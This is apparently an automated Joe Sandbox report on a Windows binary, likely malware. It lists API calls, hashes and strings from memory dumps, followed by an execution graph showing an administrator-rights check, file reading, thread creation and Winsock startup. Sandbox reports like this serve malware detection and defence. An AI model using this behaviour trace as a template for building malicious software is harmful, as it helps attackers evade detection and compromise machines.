                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$_memset_wcsrchrconstructlstrcmpi
                          • String ID:
                          • API String ID: 2078099069-0
                          • Opcode ID: 9ab7fae23a6cd178379b9f1f18c38669220ae0b06b42f2b867ea3ad8665003dc
                          • Instruction ID: 3d16b77e17d9a283d974e3b2d9caf2aabd6e780921b8546b30b3bbda698c7617
                          • Opcode Fuzzy Hash: 9ab7fae23a6cd178379b9f1f18c38669220ae0b06b42f2b867ea3ad8665003dc
                          • Instruction Fuzzy Hash: F0416072D002189BCB14DF64CD8CBDEB775EF98304F4086A9E10AB7291DB799A84CF58
                          APIs
                          • SetEvent.KERNEL32(?), ref: 00422ED6
                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00422EFA
                          • CloseHandle.KERNEL32(?), ref: 00422F1C
                          • CloseHandle.KERNEL32(?), ref: 00422F3E
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventObjectSingleWait
                          • String ID:
                          • API String ID: 2857295742-0
                          • Opcode ID: 39f7e74eae33062841a8175173220392bd2f5044482dd973a01b7ec866e0e755
                          • Instruction ID: 806f4d51c55cd5237a4c8eb056a33d06353d7b9500c599e1f4b9eb86b28f91e2
                          • Opcode Fuzzy Hash: 39f7e74eae33062841a8175173220392bd2f5044482dd973a01b7ec866e0e755
                          • Instruction Fuzzy Hash: 4E2180B1600104ABDB4CCF48E7D8B7CBBB5EB95308F5610AFD10AAF6A1C7749981DB18
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                          • String ID:
                          • API String ID: 3016257755-0
                          • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                          • Instruction ID: 700365fc3ef55c6608dcef6f61c33953fe9cf20e4b8c489e702210f7e9730dcc
                          • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                          • Instruction Fuzzy Hash: 1111833240014DBBCF265E84DC62CEE3F22BB0C394F189616FA1858130C73AD972AF85
                          APIs
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 0041D967
                          • CloseHandle.KERNEL32(?), ref: 0041D978
                          • CloseHandle.KERNEL32(?), ref: 0041D985
                          • LocalFree.KERNEL32(00000000), ref: 0041D99F
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$FreeLocalObjectSingleWait
                          • String ID:
                          • API String ID: 2545295749-0
                          • Opcode ID: 863dc07376620fff7da24d9174c5540299efa758a59c26d6f6e4e2106d0de0e2
                          • Instruction ID: b3d0a684532f22b24a61b5f16c014b4f3157037c9e20523ee33484da4440396a
                          • Opcode Fuzzy Hash: 863dc07376620fff7da24d9174c5540299efa758a59c26d6f6e4e2106d0de0e2
                          • Instruction Fuzzy Hash: 311109B9E14208EFCB04DF94D988ADEBBB5FF88301F208199E9095B350D734AE85DB55
                          APIs
                            • Part of subcall function 00421DA0: ___crtGetLocaleInfoEx.LIBCMTD ref: 00421DBD
                            • Part of subcall function 00421A20: ___crtGetLocaleInfoEx.LIBCMTD ref: 00421A3D
                          • _memset.LIBCMT ref: 004158B4
                          • __snwprintf.LIBCMT ref: 004158D2
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale___crt$__snwprintf_memset
                          • String ID: SOFTWARE\%s
                          • API String ID: 2629772119-297323700
                          • Opcode ID: 08fdabdd88a08ad3748058d96fb195c2a0972b770053efd6c9ddf30f98aba3c1
                          • Instruction ID: cea314f64e5e40574c56c82fe0e1a28e51779384d737c773d0872d5a6df9b95d
                          • Opcode Fuzzy Hash: 08fdabdd88a08ad3748058d96fb195c2a0972b770053efd6c9ddf30f98aba3c1
                          • Instruction Fuzzy Hash: 4B024DB0900618DBEB24DF54DC49FEEB374BB88304F5082AAE219A7291D7745EC5CF69
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memmovelstrcpy
                          • String ID: .DLL
                          • API String ID: 1936325922-899428287
                          • Opcode ID: 206a35d59d9e2d740689b334e1245c5ab36b3454765dd59f3c4bdf7655c760d5
                          • Instruction ID: c994f9a7622422d88fdc74f0b5569615fd03aa757a2c998ac84d832c9b8b4781
                          • Opcode Fuzzy Hash: 206a35d59d9e2d740689b334e1245c5ab36b3454765dd59f3c4bdf7655c760d5
                          • Instruction Fuzzy Hash: CE514971A04218EBCB25CF94DC88FDDB7B5EB4C300F5085A9F659A7290C6B4AAC4DF58
                          APIs
                            • Part of subcall function 00401C50: _wcsrchr.LIBCMT ref: 00401C5C
                          • _memset.LIBCMT ref: 00417915
                          • __snwprintf.LIBCMT ref: 00417933
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintf_memset_wcsrchr
                          • String ID: SOFTWARE\%s
                          • API String ID: 2041709146-297323700
                          • Opcode ID: 161eb108a0679f5d3ddfddbe3ccd982563bc54e903ca1800756906d2f2878241
                          • Instruction ID: 6479d5e764fcb64d0c7f3370c6cf7eeb3759984951b727dfcb9730a64198a9bd
                          • Opcode Fuzzy Hash: 161eb108a0679f5d3ddfddbe3ccd982563bc54e903ca1800756906d2f2878241
                          • Instruction Fuzzy Hash: F43184B5A14208BBDB14DBA0DC49FEE7778FF44700F5085A9F509A7280D7799A88CF58
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintf_memset
                          • String ID: SOFTWARE\%s
                          • API String ID: 2455478650-297323700
                          • Opcode ID: 5ba5ccad96fceb57a24ead9c0c6bdca8ce5eca305943ad0a8fe1ca6a856502be
                          • Instruction ID: 8c345f43bd84863ed8d839e80dad8bcf226fe1c04e4c0914365b140f81968092
                          • Opcode Fuzzy Hash: 5ba5ccad96fceb57a24ead9c0c6bdca8ce5eca305943ad0a8fe1ca6a856502be
                          • Instruction Fuzzy Hash: CF215E74B44308BBDB20DBA0DC4EFAA7778EF48704F5084A9B609B61C1E7B55A48DB58
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintf_memset
                          • String ID: SOFTWARE\%s
                          • API String ID: 2455478650-297323700
                          • Opcode ID: 421192caa86c426d7e4603242c2833235c156fbefb79f4a68f0577cd9d758480
                          • Instruction ID: f50a489c0aae7273e8ae771a1e99404477289d93a2267ec611ba37a8f37f4417
                          • Opcode Fuzzy Hash: 421192caa86c426d7e4603242c2833235c156fbefb79f4a68f0577cd9d758480
                          • Instruction Fuzzy Hash: 0B11CC75740308BBE720DBA0DC4AFBA7378AF84B00F504569B70CA65C0E6B9AA549799
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintf_memset
                          • String ID: SOFTWARE\%s
                          • API String ID: 2455478650-297323700
                          • Opcode ID: 44b8aa7e25b707e9ab68fc0f49db161d0d079494426bfef0ae8f619570b095de
                          • Instruction ID: 810907f3e6488bf77ea5ec11b213ac1b4f10b15ab591894c8a2340feb0e9f545
                          • Opcode Fuzzy Hash: 44b8aa7e25b707e9ab68fc0f49db161d0d079494426bfef0ae8f619570b095de
                          • Instruction Fuzzy Hash: 4C118875B44308BBE720DBA0DC4AFAB7728EB44B00F504169B70DBA1C1E6F59A44DB9D
                          APIs
                            • Part of subcall function 0042959E: DecodePointer.KERNEL32(0043C8B0,00000008,00428C90,E06D7363,1FFFFFFF,19930522,?,0042481B,?,?,?,?,?,00000000,00000000,00000000), ref: 004295B0
                            • Part of subcall function 00429552: __getptd.LIBCMT ref: 0042955E
                            • Part of subcall function 00429552: _abort.LIBCMT ref: 00429580
                          • ___TypeMatch.LIBCMT ref: 004286BD
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: DecodeMatchPointerType__getptd_abort
                          • String ID: bad exception$csm
                          • API String ID: 284225101-1249633139
                          • Opcode ID: 0b6bcc1c17bbd0743a3b509b9db8e4bdde75f2ff7156fed5a729dd991485ddb9
                          • Instruction ID: 036d0ee341f43b6dde09129cd0c20801f7c8771f379164f775a2ba672f5755eb
                          • Opcode Fuzzy Hash: 0b6bcc1c17bbd0743a3b509b9db8e4bdde75f2ff7156fed5a729dd991485ddb9
                          • Instruction Fuzzy Hash: 2F018071B05219AFCB00DFA9E48099DBBB4FF04318F5480AAEC04D7302DB35E945CB59
                          APIs
                            • Part of subcall function 00424A9A: __getptd.LIBCMT ref: 00424AA0
                            • Part of subcall function 00424A9A: __getptd.LIBCMT ref: 00424AB0
                          • __getptd.LIBCMT ref: 0042886A
                            • Part of subcall function 0042928E: __getptd_noexit.LIBCMT ref: 00429291
                            • Part of subcall function 0042928E: __amsg_exit.LIBCMT ref: 0042929E
                          • __getptd.LIBCMT ref: 00428878
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __getptd$__amsg_exit__getptd_noexit
                          • String ID: csm
                          • API String ID: 803148776-1018135373
                          • Opcode ID: b539d4ac56a18326630a3c3e66a25a22088bc947c12ff966933e7d030b28235b
                          • Instruction ID: 0d246e1c7647cd66f0475fb7c6c5131747531dd188f062191e47b90da6a84a47
                          • Opcode Fuzzy Hash: b539d4ac56a18326630a3c3e66a25a22088bc947c12ff966933e7d030b28235b
                          • Instruction Fuzzy Hash: 9C012434A02225DACF34AF75E4406AEB3B5AF10311FE4486FE44196791DF389980DB59
                          APIs
                          • DecodePointer.KERNEL32(?,00428368,00000000,00000000,00000000,00000000,00000000,0042EB57,?,0042A98C,00000003,0042D754,0043C9D0,0000000C,0042D810,00405B83), ref: 0042833A
                          • __invoke_watson.LIBCMT ref: 00428356
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: DecodePointer__invoke_watson
                          • String ID: BWB
                          • API String ID: 4034010525-3782699923
                          • Opcode ID: a1caaad592fa34f26481d55f137f108f7716ebe80e2a6b6d49935f99d5524c00
                          • Instruction ID: 98f8f152122dd42cc451d7698d7a8a267dea8e09b4c4ed78da15ec27e8bb817c
                          • Opcode Fuzzy Hash: a1caaad592fa34f26481d55f137f108f7716ebe80e2a6b6d49935f99d5524c00
                          • Instruction Fuzzy Hash: 98E0B63220014DBBCF126FA2AC099AE3A6AAF44750B940469FD1484521DB3BD871EB98
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$FreeLocal
                          • String ID:
                          • API String ID: 2513001865-0
                          • Opcode ID: 95f2d89126de09528606904b127f85e58ef1d5f2467f5d375e8ba34d0f88afc0
                          • Instruction ID: 34822efe1b2a9de4f798515a86956e1406f31bfdf5beae7afcbbd5c0a8db365f
                          • Opcode Fuzzy Hash: 95f2d89126de09528606904b127f85e58ef1d5f2467f5d375e8ba34d0f88afc0
                          • Instruction Fuzzy Hash: 73F0E7B6269200CBD3A8CFA4ED8CBDA77B5E785305F10407AD51B422A0C77858CDDB19
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$FreeLocal
                          • String ID:
                          • API String ID: 2513001865-0
                          • Opcode ID: a75f2d1bb2743436d940e3abceb4b60f0ba55c646f9781cfafbd897f512c2d85
                          • Instruction ID: 34822efe1b2a9de4f798515a86956e1406f31bfdf5beae7afcbbd5c0a8db365f
                          • Opcode Fuzzy Hash: a75f2d1bb2743436d940e3abceb4b60f0ba55c646f9781cfafbd897f512c2d85
                          • Instruction Fuzzy Hash: 73F0E7B6269200CBD3A8CFA4ED8CBDA77B5E785305F10407AD51B422A0C77858CDDB19
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$FreeLocal
                          • String ID:
                          • API String ID: 2513001865-0
                          • Opcode ID: c3b0eb91f741efb3bcda686cd5d759f91907120e7356ca82b976fb4c33612c43
                          • Instruction ID: 34822efe1b2a9de4f798515a86956e1406f31bfdf5beae7afcbbd5c0a8db365f
                          • Opcode Fuzzy Hash: c3b0eb91f741efb3bcda686cd5d759f91907120e7356ca82b976fb4c33612c43
                          • Instruction Fuzzy Hash: 73F0E7B6269200CBD3A8CFA4ED8CBDA77B5E785305F10407AD51B422A0C77858CDDB19

                          Execution Graph

                          Execution Coverage:8%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:1.6%
                          Total number of Nodes:1612
                          Total number of Limit Nodes:47
11bc600 free 62 API calls 18000->18001 18002 11c1a78 18001->18002 18003 11bc600 free 62 API calls 18002->18003 18004 11c1a84 18003->18004 18005 11bc600 free 62 API calls 18004->18005 18006 11c1a90 18005->18006 18007 11bc600 free 62 API calls 18006->18007 18008 11c1a9c 18007->18008 18009 11bc600 free 62 API calls 18008->18009 18010 11c1aa8 18009->18010 18011 11bc600 free 62 API calls 18010->18011 18012 11c1ab4 18011->18012 18013 11bc600 free 62 API calls 18012->18013 18014 11c1ac0 18013->18014 18015 11bc600 free 62 API calls 18014->18015 18016 11c1acc 18015->18016 18017 11bc600 free 62 API calls 18016->18017 18018 11c1ad8 18017->18018 18019 11bc600 free 62 API calls 18018->18019 18020 11c1ae4 18019->18020 18021 11bc600 free 62 API calls 18020->18021 18022 11c1af0 18021->18022 18023 11bc600 free 62 API calls 18022->18023 18024 11c1afc 18023->18024 18025 11bc600 free 62 API calls 18024->18025 18026 11c1b08 18025->18026 18027 11bc600 free 62 API calls 18026->18027 18028 11c1b14 18027->18028 18029 11bc600 free 62 API calls 18028->18029 18030 11c1b20 18029->18030 18031 11bc600 free 62 API calls 18030->18031 18032 11c1b2c 18031->18032 18033 11bc600 free 62 API calls 18032->18033 18034 11c1b38 18033->18034 18035 11bc600 free 62 API calls 18034->18035 18036 11c1b44 18035->18036 18037 11bc600 free 62 API calls 18036->18037 18038 11c1b50 18037->18038 18039 11bc600 free 62 API calls 18038->18039 18040 11c1b5c 18039->18040 18041 11bc600 free 62 API calls 18040->18041 18042 11c1b68 18041->18042 18043 11bc600 free 62 API calls 18042->18043 18044 11c1b74 18043->18044 18045 11bc600 free 62 API calls 18044->18045 18046 11c1b80 18045->18046 18047 11bc600 free 62 API calls 18046->18047 18048 11c1b8c 18047->18048 18049 11bc600 free 62 API calls 18048->18049 18050 11c1b98 18049->18050 18051 11bc600 free 62 API calls 18050->18051 18052 11c1ba4 18051->18052 18053 11bc600 free 62 API calls 18052->18053 18054 11c1bb0 18053->18054 18055 11bc600 free 62 API calls 18054->18055 18056 11c1bbc 
18055->18056 18057 11bc600 free 62 API calls 18056->18057 18058 11c1bc8 18057->18058 18059 11bc600 free 62 API calls 18058->18059 18060 11c1bd4 18059->18060 18061 11bc600 free 62 API calls 18060->18061 18062 11c1be0 18061->18062 18063 11bc600 free 62 API calls 18062->18063 18064 11c1bec 18063->18064 18065 11bc600 free 62 API calls 18064->18065 18066 11c1bf8 18065->18066 18067 11bc600 free 62 API calls 18066->18067 18068 11c1c04 18067->18068 18069 11bc600 free 62 API calls 18068->18069 18070 11c1c10 18069->18070 18071 11bc600 free 62 API calls 18070->18071 18072 11c1c1c 18071->18072 18073 11bc600 free 62 API calls 18072->18073 18074 11c1c28 18073->18074 18075 11bc600 free 62 API calls 18074->18075 18076 11c1c34 18075->18076 18077 11bc600 free 62 API calls 18076->18077 18078 11c1c40 18077->18078 18079 11bc600 free 62 API calls 18078->18079 18080 11c1c4c 18079->18080 18081 11bc600 free 62 API calls 18080->18081 18082 11c1c58 18081->18082 18083 11bc600 free 62 API calls 18082->18083 18084 11c1c64 18083->18084 18085 11bc600 free 62 API calls 18084->18085 18086 11c1c70 18085->18086 18087 11bc600 free 62 API calls 18086->18087 18088 11c1c7c 18087->18088 18089 11bc600 free 62 API calls 18088->18089 18090 11c1c88 18089->18090 18091 11bc600 free 62 API calls 18090->18091 18092 11c1c94 18091->18092 18093 11bc600 free 62 API calls 18092->18093 18094 11c1ca0 18093->18094 18095 11bc600 free 62 API calls 18094->18095 18096 11c1cac 18095->18096 18097 11bc600 free 62 API calls 18096->18097 18098 11c1cb8 18097->18098 18099 11bc600 free 62 API calls 18098->18099 18100 11c1cc4 18099->18100 18101 11bc600 free 62 API calls 18100->18101 18102 11c1cd0 18101->18102 18103 11bc600 free 62 API calls 18102->18103 18104 11c1cdc 18103->18104 18105 11bc600 free 62 API calls 18104->18105 18106 11c1ce8 18105->18106 18107 11bc600 free 62 API calls 18106->18107 18108 11c1cf4 18107->18108 18109 11bc600 free 62 API calls 18108->18109 18110 11c1d00 18109->18110 18111 11bc600 free 62 API calls 
18110->18111 18112 11c1d0c 18111->18112 18113 11bc600 free 62 API calls 18112->18113 18114 11c1d18 18113->18114 18115 11bc600 free 62 API calls 18114->18115 18116 11c1d24 18115->18116 18117 11bc600 free 62 API calls 18116->18117 18118 11c1d30 18117->18118 18119 11bc600 free 62 API calls 18118->18119 18120 11c1d3c 18119->18120 18121 11bc600 free 62 API calls 18120->18121 18122 11c1d48 18121->18122 18123 11bc600 free 62 API calls 18122->18123 18124 11c1d54 18123->18124 18125 11bc600 free 62 API calls 18124->18125 18125->18126 18126->17898 18129 11b9a86 18128->18129 18130 11c0475 18128->18130 18129->17821 18129->17822 18131 11baa70 _errno 62 API calls 18130->18131 18132 11c047a 18131->18132 18133 11baa08 _invalid_parameter_noinfo 17 API calls 18132->18133 18133->18129 18135 11c0201 18134->18135 18137 11c020e 18134->18137 18136 11baa70 _errno 62 API calls 18135->18136 18138 11c0206 18136->18138 18137->18138 18139 11baa70 _errno 62 API calls 18137->18139 18138->17836 18140 11c0245 18139->18140 18141 11baa08 _invalid_parameter_noinfo 17 API calls 18140->18141 18141->18138 18143 11c06cc __setargv 62 API calls 18142->18143 18144 11c01bd 18143->18144 18144->17827 18146 11c00ff 18145->18146 18147 11c00e7 18145->18147 18148 11c0176 18146->18148 18153 11c0131 18146->18153 18193 11baa90 18147->18193 18150 11baa90 __doserrno 62 API calls 18148->18150 18152 11c017b 18150->18152 18155 11baa70 _errno 62 API calls 18152->18155 18196 11c28b8 18153->18196 18154 11baa70 _errno 62 API calls 18157 11c00f4 18154->18157 18158 11c0183 18155->18158 18157->17826 18160 11baa08 _invalid_parameter_noinfo 17 API calls 18158->18160 18160->18157 18161 11c0144 18206 11bf964 18161->18206 18162 11c0155 18164 11baa70 _errno 62 API calls 18162->18164 18166 11c015a 18164->18166 18165 11c0151 18258 11c2960 LeaveCriticalSection 18165->18258 18167 11baa90 __doserrno 62 API calls 18166->18167 18167->18165 18170 11bf8a3 18169->18170 18171 11bf8bb 18169->18171 18173 11baa90 __doserrno 62 API calls 18170->18173 
18172 11bf935 18171->18172 18176 11bf8ed 18171->18176 18174 11baa90 __doserrno 62 API calls 18172->18174 18175 11bf8a8 18173->18175 18177 11bf93a 18174->18177 18178 11baa70 _errno 62 API calls 18175->18178 18179 11c28b8 _flush 64 API calls 18176->18179 18180 11baa70 _errno 62 API calls 18177->18180 18192 11bf8b0 18178->18192 18181 11bf8f4 18179->18181 18182 11bf942 18180->18182 18183 11bf912 18181->18183 18184 11bf900 18181->18184 18185 11baa08 _invalid_parameter_noinfo 17 API calls 18182->18185 18187 11baa70 _errno 62 API calls 18183->18187 18186 11bf7e8 _flush 64 API calls 18184->18186 18185->18192 18188 11bf90d 18186->18188 18189 11bf917 18187->18189 18290 11c2960 LeaveCriticalSection 18188->18290 18190 11baa90 __doserrno 62 API calls 18189->18190 18190->18188 18192->17826 18194 11bad14 _errno 62 API calls 18193->18194 18195 11baa99 18194->18195 18195->18154 18197 11c292d 18196->18197 18198 11c28f9 18196->18198 18199 11c0138 18197->18199 18200 11c2931 EnterCriticalSection 18197->18200 18201 11c0c94 _lock 62 API calls 18198->18201 18199->18161 18199->18162 18200->18199 18202 11c2901 18201->18202 18203 11c2909 InitializeCriticalSectionAndSpinCount 18202->18203 18204 11c2923 18202->18204 18203->18204 18259 11c0b94 LeaveCriticalSection 18204->18259 18208 11bf986 _flush 18206->18208 18207 11bf9ba 18209 11baa90 __doserrno 62 API calls 18207->18209 18208->18207 18211 11bfa20 18208->18211 18245 11bf9ae 18208->18245 18212 11bf9bf 18209->18212 18210 11bc5e0 _cftoe_l 8 API calls 18213 11c00a9 18210->18213 18214 11bfa35 18211->18214 18260 11bf7e8 18211->18260 18215 11baa70 _errno 62 API calls 18212->18215 18213->18165 18217 11c01f8 _isatty 62 API calls 18214->18217 18218 11bf9c6 18215->18218 18219 11bfa3c 18217->18219 18220 11baa08 _invalid_parameter_noinfo 17 API calls 18218->18220 18221 11bfd0e 18219->18221 18224 11bad98 _getptd 62 API calls 18219->18224 18220->18245 18222 11bfd25 18221->18222 18223 11c0023 WriteFile 18221->18223 18225 11bfdfe 18222->18225 18233 11bfd33 
18222->18233 18226 11bfcf8 GetLastError 18223->18226 18238 11bfcce 18223->18238 18227 11bfa60 GetConsoleMode 18224->18227 18237 11bfe08 18225->18237 18252 11bfee0 18225->18252 18226->18238 18227->18221 18229 11bfa91 18227->18229 18228 11c0059 18230 11baa70 _errno 62 API calls 18228->18230 18228->18245 18229->18221 18232 11bfa9e GetConsoleCP 18229->18232 18234 11c0081 18230->18234 18231 11bfffd 18235 11c004d 18231->18235 18236 11c0002 18231->18236 18232->18238 18256 11bfab8 _flush 18232->18256 18233->18228 18233->18238 18239 11bfd7f WriteFile 18233->18239 18240 11baa90 __doserrno 62 API calls 18234->18240 18273 11baab0 18235->18273 18242 11baa70 _errno 62 API calls 18236->18242 18237->18228 18237->18238 18243 11bfe61 WriteFile 18237->18243 18238->18228 18238->18231 18238->18245 18239->18226 18239->18233 18240->18245 18241 11bff30 WideCharToMultiByte 18247 11c0019 GetLastError 18241->18247 18241->18252 18246 11c0007 18242->18246 18243->18226 18243->18237 18245->18210 18248 11baa90 __doserrno 62 API calls 18246->18248 18247->18238 18248->18245 18250 11bff80 WriteFile 18251 11bffca GetLastError 18250->18251 18250->18252 18251->18252 18252->18228 18252->18238 18252->18241 18252->18250 18253 11c2988 WriteConsoleW CreateFileW _flush 18253->18256 18254 11bfb5e WideCharToMultiByte 18254->18238 18255 11bfba1 WriteFile 18254->18255 18255->18226 18255->18256 18256->18226 18256->18238 18256->18253 18256->18254 18257 11bfbfa WriteFile 18256->18257 18270 11c0a38 18256->18270 18257->18226 18257->18256 18278 11c2844 18260->18278 18263 11bf81b SetFilePointer 18266 11bf839 GetLastError 18263->18266 18267 11bf80f 18263->18267 18264 11bf80a 18265 11baa70 _errno 62 API calls 18264->18265 18265->18267 18266->18267 18268 11bf843 18266->18268 18267->18214 18269 11baab0 _close_nolock 62 API calls 18268->18269 18269->18267 18271 11b951c _cftof_l 62 API calls 18270->18271 18272 11c0a4c 18271->18272 18272->18256 18274 11bad14 _errno 62 API calls 18273->18274 18275 11baabd 18274->18275 18276 
11bad14 _errno 62 API calls 18275->18276 18277 11baad6 realloc 18276->18277 18277->18245 18279 11c284d 18278->18279 18280 11c2862 18278->18280 18281 11baa90 __doserrno 62 API calls 18279->18281 18282 11baa90 __doserrno 62 API calls 18280->18282 18285 11bf804 18280->18285 18283 11c2852 18281->18283 18286 11c289c 18282->18286 18284 11baa70 _errno 62 API calls 18283->18284 18284->18285 18285->18263 18285->18264 18287 11baa70 _errno 62 API calls 18286->18287 18288 11c28a4 18287->18288 18289 11baa08 _invalid_parameter_noinfo 17 API calls 18288->18289 18289->18285 18298 11b23b6 18299 11b23d0 18298->18299 18300 11b24bc 18299->18300 18366 11adef0 AllocateAndInitializeSid 18299->18366 18301 11b24ca 18300->18301 18449 119f200 18300->18449 18305 11b24d8 18301->18305 18306 11b24d3 18301->18306 18307 11b24e1 18305->18307 18308 11b24e6 18305->18308 18462 119ee80 LocalAlloc 18306->18462 18497 11ac1a0 CreateThread 18307->18497 18330 11a6800 18308->18330 18311 119f510 96 API calls 18313 11b2416 18311->18313 18313->18300 18315 11b242d 18313->18315 18318 11b84a8 89 API calls 18315->18318 18316 11b24f9 CreateEventW 18317 11b2562 WSAStartup 18316->18317 18319 11b251d CreateThread 18316->18319 18320 11b25e0 18317->18320 18321 11b2575 18317->18321 18322 11b2478 18318->18322 18323 11b2553 18319->18323 18324 11b2555 CloseHandle 18319->18324 18325 11b25aa CreateThread 18321->18325 18326 11b257e CreateThread 18321->18326 18371 1197ef0 18322->18371 18323->18317 18324->18317 18325->18320 18328 11b25e7 WSACleanup 18325->18328 18775 11b5e50 OpenEventW 18325->18775 18326->18325 18328->18320 18331 11a6817 18330->18331 18332 11a681c 18331->18332 18499 119f790 SHGetKnownFolderPath 18331->18499 18332->18316 18332->18317 18337 11a6d51 LocalFree 18337->18332 18338 11a6876 LocalAlloc 18339 11a6d2b 18338->18339 18340 11a6897 lstrcpyW StrStrIW CreateFileW 18338->18340 18341 11a6d3e 18339->18341 18342 11a6d33 LocalFree 18339->18342 18343 11a690a GetFileSize 18340->18343 18344 11a6d20 LocalFree 18340->18344 
18341->18337 18345 11a6d46 LocalFree 18341->18345 18342->18341 18346 11a6d0d 18343->18346 18347 11a6926 LocalAlloc 18343->18347 18344->18339 18345->18337 18346->18344 18348 11a6d15 CloseHandle 18346->18348 18347->18346 18349 11a6948 ReadFile 18347->18349 18348->18344 18350 11a697f CloseHandle 18349->18350 18351 11a6d02 LocalFree 18349->18351 18352 11a69e6 18350->18352 18351->18346 18575 11b0e30 18352->18575 18354 11a6a5a 18354->18351 18355 11a6a99 LocalAlloc 18354->18355 18360 11a6cad 18354->18360 18356 11a6ac0 LocalAlloc 18355->18356 18355->18360 18357 11a6c9f LocalFree 18356->18357 18358 11a6ae7 wmemmove 18356->18358 18357->18360 18359 11a6b01 lstrcpyW lstrcpyW lstrcpyW 18358->18359 18363 11a6bae 18359->18363 18360->18351 18361 11a6cec VirtualFree 18360->18361 18361->18351 18362 11a6c91 LocalFree 18362->18357 18363->18362 18364 11a6c08 LocalFree LocalFree LocalFree LocalFree 18363->18364 18364->18332 18367 11adf9c 18366->18367 18368 11adf73 CheckTokenMembership 18366->18368 18367->18300 18367->18311 18369 11adf89 18368->18369 18370 11adf91 FreeSid 18368->18370 18369->18370 18370->18367 18602 11a7e10 18371->18602 18373 1197f77 